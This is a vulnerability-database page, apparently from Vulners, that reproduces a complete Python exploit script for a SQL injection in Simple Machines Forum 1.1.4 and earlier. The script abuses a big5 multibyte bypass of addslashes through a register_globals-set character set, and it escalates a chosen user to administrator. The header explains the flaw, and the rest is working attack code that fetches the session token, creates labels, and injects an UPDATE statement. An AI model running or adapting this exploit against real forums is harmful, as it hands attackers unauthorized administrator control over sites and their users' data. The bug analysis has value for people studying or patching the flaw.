Vulners
Lucene search
Simple Machines Forum <= 1.1.4 Remote SQL Injection Exploit
===========================================================
Simple Machines Forum <= 1.1.4 Remote SQL Injection Exploit
===========================================================
#!/usr/bin/python
"""
#=================================================================================================#
# ____ __________ __ ____ __ #
# /_ | ____ |__\_____ \ _____/ |_ /_ |/ |_ #
# | |/ \ | | _(__ <_/ ___\ __\ ______ | \ __\ #
# | | | \ | |/ \ \___| | /_____/ | || | #
# |___|___| /\__| /______ /\___ >__| |___||__| #
# \/\______| \/ \/ #
#=================================================================================================#
# This was a priv8 Exploit #
#=================================================================================================#
# Simple Machines Forum <= 1.1.4 #
# Sql Injection Vulnerability #
# Priviledge Escalation Exploit #
#====================================#===========#====================================#===========#
# Server Configuration Requirements # # Some Information # #
#====================================# #====================================# #
# # #
# register_globals = 1 # Vendor: www.simplemachines.org #
# # Author: The:Paradox #
#================================================# Severity: N/A #
# # #
# You may find exploits updates and more # #
# explanations on => # Proud To Be Italian. #
# http://paradox.altervista.org # #
# # #
#====================================#===========#================================================#
# Board Description # #
#====================================# #
# #
# Simple Machines Forum - SMF in short - is a free, professional grade software package that #
# allows you to set up your own online community within minutes. #
# Its powerful custom made template engine puts you in full control of the lay-out of your #
# message board and with our unique SSI - or Server Side Includes - function you can let your #
# forum and your website interact with each other. #
# SMF is written in the popular language PHP and uses a MySQL database. It is designed to provide #
# you with all the features you need from a bulletin board while having an absolute minimal #
# impact on the resources of the server. #
# SMF is the next generation of forum software - and best of all it is and will always #
# remain completely free! #
# #
#====================================#============================================================#
# Proof Of Concept / Bug Explanation # #
#====================================# #
# This is a quite old exploit and it is inapplicable on 1.1.5 version and on last 2.0 pre-release #
# (that's why I decided to public it). First, let's have a little poc. #
#=================================================================================================#
[Load.php]
148. if (isset($db_character_set) && preg_match('~^\w+$~', $db_character_set) === 1)
149. db_query("
150. SET NAMES $db_character_set", __FILE__, __LINE__);
#=================================================================================================#
# In Load.php if $db_character_set is set Smf will execute a Set Names Sql Query. #
# Directly from dev.mysql.com let's see what it means. #
# #
# "SET NAMES indicates what character set the client will use to send SQL statements to the #
# the server. Thus, SET NAMES 'cp1251' tells the server future incoming messages from this client #
# are in character set cp1251." #
# #
# Ok, now let's see what $db_character_set is. #
# $db_character_set is a "Settings.php variable" written only if a "Non-Default tick" #
# is checked during the installation process. #
# The real vulnerability is when the "Non-Default tick" is left unchecked, Smf doesn't write #
# it in "Settings.php" and no value is assigned to it: it's possible to set it #
# via register_globals. #
# #
# Now the cool poc section =D #
# Surely you saw that preg_match avoids any injection of non-alphanumerical chars in the query #
# at line 150 in Load.php #
# So, how is possible to take advantage of that? #
# To understand this vulnerability you have to comprehend some character set presents multibyte #
# characters and they may obiate addslashes() function. #
# Addslashes simply adds a backslash (0x5c) before single quote ('), double quote ("), #
# backslash (\) and NUL (the NULL byte), without checking if the added blackslash creates #
# another char. #
# No, i'm not going mad :P Here is an example: #
# #
# Bytes in Input #
# 0xa327 #
# #
# Addslashes(Bytes in Input) #
# 0xa35c27 #
# #
# In big5, but also in other multibyte charsets, 0xa35c is a valid char: 0x27 (') is left alone. #
# Therefore a lot of smf's queries are vulnerable if $db_character_set is settable. #
# In this exploit i will inject sql code in Update syntax, increasing user's privledges. #
#=================================================================================================#
# Exploit tested on 1.1.3 and 1.1.4 Smf's versions. #
#=================================================================================================#
# Use this exploit at your own risk. You are responsible for your own deeds. #
#=================================================================================================#
# Python Exploit Starts #
#=================================================================================================#
"""
from sys import argv, exit
from httplib import HTTPConnection
from urllib import urlencode, unquote
from time import sleep
print """
#=================================================================#
# Simple Machines Forum <= 1.1.4 #
# Sql Injection Vulnerability #
# Priviledge Escalation Exploit #
# #
# ###################################### #
# # Let's get administrator rights!!! # #
# ###################################### #
# #
# Discovered By The:Paradox #
# #
# Usage: #
# ./Exploit [Target] [Path] [PHPSessID] [Userid] #
# #
# Example: #
# ./Exploit 127.0.0.1 /SMF/ a574bfe34d95074dea69c00e38851722 9 #
# ./Exploit www.host.com / 11efb3b6031bc79a8dd7526750c42119 36 #
#=================================================================#
"""
if len(argv)<=4: exit()
sn = "PHPSESSID" # Session cookie name. You may have to change this.
port = 80
target = argv[1]
path = argv[2]
sv = argv[3]
uid = argv[4]
class killsmf:
def __init__(self):
print "[.] Exploit Starts."
self.GetSesc()
self.CreateLabels()
self.Inject()
print "[+] All done.\n Now user with ID_MEMBER " + uid + " should have administrator rights. \n -= Paradox Got This One =-"
def GetSesc(self):
print "[+] Trying to read Sesc"
for i in range (0,2):
conn = HTTPConnection(target,port)
conn.request("GET", path + "index.php?action=pm;sa=manlabels;", {}, {"Accept": "text/plain","Cookie": sn + "=" + sv + ";"})
rsp = conn.getresponse()
r = rsp.read()
if rsp.status == 404:
exit ("[-] Error 404. Not Found")
elif r.find('<input type="hidden" name="sc" value="') != -1 and r.find('" />') != -1 :
self.sesc = r.split('<input type="hidden" name="sc" value="')[1].split('" />')[0]
if len(self.sesc) != 32: exit ("[-] Invalid Sesc")
print "[+] Sesc has been successfully read ==> "+self.sesc
else:
exit ("[-] Unable to find Sesc")
def CreateLabels(self):
print "[+] Creating three labels..."
for i in range (0,3):
conn = HTTPConnection(target,port)
conn.request("POST", path + "index.php?action=pm;sa=manlabels;sesc="+self.sesc, urlencode({"label" : i, "add" : "Add+New+Label"}), {"Accept": "text/plain","Content-type": "application/x-www-form-urlencoded","Referer": "http://" + target + path + "/index.php?action=pm;sa=manlabels", "Cookie": sn + "=" + sv + ";"})
sleep(0.35)
def Inject(self):
print "[+] Sql code is going to be injected."
conn = HTTPConnection(target,port)
conn.request("POST", path + "index.php?debug;action=pm;sa=manlabels;sesc="+self.sesc, urlencode({"label_name[0]" : "o rly" + unquote("%a3%27"),"label_name[1]" : "ID_GROUP=1 WHERE/*", "label_name[2]" : "*/ID_MEMBER=" + uid + "/*", "save" : "Save", "sc" : self.sesc, "db_character_set": "big5"}), {"Accept": "text/plain","Content-type": "application/x-www-form-urlencoded","Referer": "http://" + target + path + "/index.php?action=pm;sa=manlabels", "Cookie": sn + "=" + sv + ";"})
killsmf()
# 0day.today [2018-02-09] #Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
15 Jun 2008 00:00Current
7.1High risk
Vulners AI Score7.1